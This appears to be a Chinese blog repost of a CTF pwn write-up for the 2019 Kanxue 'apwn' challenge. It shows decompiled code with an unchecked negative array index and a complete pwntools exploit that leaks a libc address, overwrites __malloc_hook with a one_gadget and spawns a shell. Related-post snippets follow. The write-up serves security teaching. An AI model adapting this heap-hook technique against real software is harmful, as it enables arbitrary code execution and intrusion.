2019看雪CTF晋级赛Q1——apwn

最新推荐文章于 2023-01-20 00:00:00 发布
最新推荐文章于 2023-01-20 00:00:00 发布
阅读量337 收藏
点赞数
原文链接:http://www.cnblogs.com/pfcode/p/10729663.html
版权

保护全开   #数组越界

程序逻辑

 1 int __cdecl main(int argc, const char **argv, const char **envp)
 2 {
 3   __int64 savedregs; // [rsp+10h] [rbp+0h]
 4  
 5   puts("This is a little game\n");
 6   puts("You can create a character and choose if he needs a partner.\n");
 7   while ( 1 )
 8   {
 9     menu("You can create a character and choose if he needs a partner.\n", argv);
10     read_int("You can create a character and choose if he needs a partner.\n");
11     switch ( (unsigned int)&savedregs )
12     {
13       case 1u:
14         singledog();
15         break;
16       case 2u:
17         luckydog();
18         break;
19       case 3u:
20         edit_singledog();
21         break;
22       case 4u:
23         edit_luckydog();
24         break;
25       case 5u:
26         save_singledog();
27         break;
28       case 6u:
29         exit(1);
30         return;
31       default:
32         continue;
33     }
34   }
35 }

 

在edit_singledog(),edit_luckydog()中,没有对数组的界限进行限制,所以可以对任意地址进行读写,所以泄露libc基址是最先考虑的问题。

ida查看two[-4]处即FILE *stderr

所以我这里泄露public stderr@@GLIBC_2_2_5(_IO_2_1stderr)地址进行分析。

 

 1 unsigned __int64 edit_singledog()
 2 {
 3   int v1; // [rsp+4h] [rbp-Ch]
 4   unsigned __int64 v2; // [rsp+8h] [rbp-8h]
 5 
 6   v2 = __readfsqword(0x28u);
 7   puts("which?");
 8   v1 = read_int();
 9   if ( two[v1] )           //数组越界
10   {
11     puts("Oh,singledog,changing your name can bring you good luck.");
12     read(0, two[v1], 0x20uLL);
13     printf("new name: %s", two[v1]);
14   }
15   else
16   {
17     puts("nothing here");
18   }
19   return __readfsqword(0x28u) ^ v2;
20 }

exploit

 1 from pwn import *
 2 p=process('./apwn')
 3 elf=ELF('./apwn')
 4 libc=ELF('/lib/x86_64-linux-gnu/libc.so.6')
 5 
 6 p.recv()
 7 p.sendline('1')
 8 p.recv()
 9 p.sendline('test')
10 p.recv()
11 p.sendline('3')
12 p.recv()
13 p.sendline('-4')    
14 p.recv()
15 p.sendline('fffffff')
16 p.recv(18)
17 leak_addr=p.recv(6)   #泄露_IO_2_1stderr地址
18 _IO_2_1_stderr_addr=(u64(leak_addr.ljust(8,'\x00')))-0x83
19 libc_base=_IO_2_1_stderr_addr-libc.symbols['_IO_2_1_stderr_']
20 p.recv()
21 print 'libc_base: '+hex(libc_base)
22 
23 p.sendline('2')
24 p.recv()
25 p.sendline('xxxx')
26 p.recv()
27 p.sendline('yyyy')
28 p.recv()
29 p.sendline('3')
30 p.recv()
31 p.sendline('80')     #将one[1]修改为__malloc_hook地址
32 p.recv()
33 p.sendline(p64(libc_base+libc.symbols['__malloc_hook']))    
34 p.recv()
35 p.sendline('4')
36 p.recv()
37 p.sendline('0')
38 p.recv()
39 p.sendline('xxxx')
40 p.recv()
41 payload=p64(libc_base+0xf1147) #将__malloc_hook地址修改为one_gadget
42 p.sendline(payload)
43 p.recv()
44 p.sendline('1') #触发__malloc_hook
45 p.interactive()

 https://bbs.pediy.com/thread-250417.htm

转载于:https://www.cnblogs.com/pfcode/p/10729663.html

aaa15893831716
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
180822 逆向-网鼎杯(2-1)
whklhhhh的博客
08-22 2211
Reverse martricks main函数中接收输入以后将input和一个字符串异或一下存入savedregs中 这里7*(i_23/7)+i_23%7这种写法实际上还是i_23,只不过表示成了第x行y列的形式(7个元素/行) 两个数组分别存放在了savedregs-192和savedregs-128中 下面两层嵌套循环,中间进行了一个累加的运算 关键是箭头所指向的积的累...
看雪CTF-2019-Q1
BadRer的博客
04-02 1174
前言 比的时候抽空做了几题,后花了点时间把RE都做了。除了圆舞曲。 pizza 实在太强了 简略的写写 变形金刚 android的逆向,比较简单。最好是拿真机调试。 主要就是根据字符串找到程序流程,然后在so中找到eq函数,算法也比较简单,RC4+base64 。 初入好望角 .Net 逆向,AES算法识别,其实是Rijndael算法,两者区别不大。 解密最好用C#来写。 流浪者 签到题 ...
看雪CTF 拯救单身狗 apwn
snowleopard_bin的博客
03-28 727
漏洞类型 堆的整数负数溢出 保护机制 全保护 关键代码 if ( two[v1] )//没考虑负数 { puts("Oh,singledog,changing your name can bring you good luck."); read(0, (void *)two[v1], 0x20uLL); printf("new name: %s", two[...
ARM pwn 入门 (1)
CoLin的pwn小屋
11-02 1139
ARM pwn 入门(1) —— 前置知识
暑假训练pwn(3) 不能被落下太远额
doudoudedi
07-30 181
实验吧的ropbaby 今天是一道ROP(64位)的我本地打不通nc连不上我服了 但这道题还是可以的我们 这个文件的main函数可以直接告诉我么system函数的地址然后我们就可以根据它给我们的libc文件得到偏移然后算出基地址,最后算出’/bin/sh’的地址然后ROP链起来用ROPgadget --binary libc-2.23.so --only ‘pop|ret’ 得到pop rdi...
[Hgame]math
weixin_73384894的博客
01-20 237
五元一次方程
CTF信息安全比单项选择题.docx
01-25
CTF信息安全比单项选择题.
2019领航杯CTF题目
11-25
2019领航杯CTF的原题,文件恢复和DNS两题没有
【HackPack CTF】 WEB——持续更新中
12-21
题目地址 ...打开是酱紫 sui便打开一个404找不到 先演示错误思路: Plan A.... 上bp抓包,Ctrl + I,爆破点为/后的数字比如1,sniper狙击手模式, ...playload 用runtime file ...换思路,找宝藏,要想有地图,hi
CTF AWD比工具收集.zip
最新发布
09-30
项目源码
D^3CTF 2019 Challenges.zip
08-16
D^3CTF 2019 CTF
incaseformat病毒分析
whatiwhere的博客
01-14 5667
愚人节病毒 ??? 不同于熊猫烧香 彩虹猫 之前的钉_钉病毒, 2021年1月13号 incaseformat蠕虫病毒来袭,会自动复制到windows目录下,并写入注册表,重启电脑后,病毒会遍历除了系统盘外的所有磁盘进行删除。 病毒检出率 病毒行为分析 PEID分析 使用Borland Delphi 6.0 - 7.0 [Overlay]编写 先查看字符串信息 进行定位 危险函数相关代码 int TForm1_FormCreate() { __writefsdword(0, (unsigned
[看雪CTF]2019晋级Q1第一题流浪者
xuenixiang.com
03-27 643
一直在忙,晚上抽空打开题目,看到大佬们300多秒就解出来了,我只能写个详细点的wp来混存在感了。 首先查壳,VC程序,没壳 直接导入IDA定位到关键算法部分 通过F5可以看到伪C代码,主要讲的是我们输入的假码如果在0-9之间,就把对应的ASCII减0x30,假码如果在a-z之间,就把对应的ASCII减0x57,假码如果在A-Z之间,就把对应的ASCII减0x1D 大佬看到这里就...
简单逆向22
m0_49936845的博客
08-02 182
诺莫22
2019看雪CTF 晋级Q2第四题wp
07-22 318
上次参加2019看雪CTF 晋级Q2卡在了这道题上,虽然逆出算法,但是方程不会解,哈哈哈哈,果然数学知识很重要呀,现在记录一下。 首先根据关键信息,根据错误提示字符串定位到这里: 1 int __thiscall guanjian_401EA0(CWnd *this) 2 { 3 CWnd *v1; // esi 4 int index; // eax ...
pwn学习总结(五) —— 堆溢出经典题型整理
qq_41988448的博客
12-29 1997
pwn学习总结(九) —— 经典题目整理三(持续更新)fastbin + 栈溢出fastbin + 函数构造 fastbin + 栈溢出 题目:fastbin 环境:ubuntu 16.04 下载地址:https://pan.baidu.com/s/1R6-BVR91Io_ZVPDDpBcCkA 提取码:r7e5 查看程序防护: 使用ida进行反编译: 已知条件: 可以得到mai...
CTF中pwn的入门指南
信息安全专题
10-21 6946
CTF中pwn的入门指南 pwn简介: CTF中的pwn指的是通过通过程序本身的漏洞,编写利用脚本破解程序拿到主机的权限,这就需要对程序进行分析,了解操作系统的特性和相关漏洞,是是一个难度比较大的分支。   接下来介绍相关的学习思路(自己总结的,当作参考) 0x01 基础知识准备   pwn相对于web,更需要专业的技能和知识,最主要的是要学会如何分析程序,这就需要有足够的准备 c语言 汇编语言 python 操作系统 linux操作   C语言是最基础的,当下的比大部分的pwn题目使用
从入门到放弃系列之 N1CTF2018 pwn vote writeup
zhangji
03-12 663
N1CTF2018 pwn vote writeup 检查程序的安全防护情况 [*] '/home/zhangji16/c_study/vuln/n1ctf2018/pwn/vote/vote_patch Arch: amd64-64-little RELRO: Partial RELRO Stack: Canary found NX: NX enabled ...
第四题点评及解题思路——拯救单身狗1
08-03
本文是关于《拯救单身狗》CTF第四题的点评及解题思路。本次比由一个名为“拯救单身狗”的团队发起,旨在通过解题活动来拯救那些孤独的单身狗,因此吸引了大量围观人数和44支战队的参与。这道题目的设计围绕着...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值